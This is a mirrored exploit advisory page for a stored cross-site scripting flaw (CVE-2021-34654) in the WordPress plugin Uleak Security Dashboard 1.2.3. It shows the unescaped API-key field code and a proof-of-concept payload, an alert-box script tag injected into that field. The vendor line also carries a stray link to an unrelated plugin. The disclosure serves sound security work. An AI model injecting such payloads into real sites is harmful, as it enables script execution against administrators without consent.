Advertisement






WordPress Uleak Security Dashboard 1.2.3 Cross Site Scripting

CVE Category Price Severity
CVE-2021-34654 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2022-04-05
CPE
cpe:cpe:/a:wordpress:uleak_security_dashboard:1.2.3
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022040001

Below is a copy:

WordPress Uleak Security Dashboard 1.2.3 Cross Site Scripting
# Exploit Title: WordPress Plugin uleak-security-dashboard 1.2.3 - Stored Cross-Site Scripting (Authenticated)
# Date: 31-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/uleak-security-dashboard/ <https://wordpress.org/plugins/amministrazione-aperta/>
# Version: 1.2.3
# Tested on: Firefox
# Contact me: h [at] spidersilk.com

# Vulnerable Code:

```
<th scope="row"><label>ULeak API Key*: </label></th>
<td><input type="text" name="ul_apikey" placeholder="XXXXXXXXXXX"
value="'.$user['apikey'].'"><span class="description">(Insert your ULeak
API Key. Find your Credentials in your profil settings <a target="_blank"
href="https://uleak.de/profil">here</a>)</span></td>
```

# POC

1) Install uleak-security-dashboard WordPress Plugin
2) Naviagete to http://localhost/wp-admin/tools.php?page=uleak
3) Inject payload ```"><script>alert(1)</script>```
in *ULeak API Key*: *filed.
4) XSS will trigger.

# POC Image

https://prnt.sc/D7sq6IlNtNaf

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.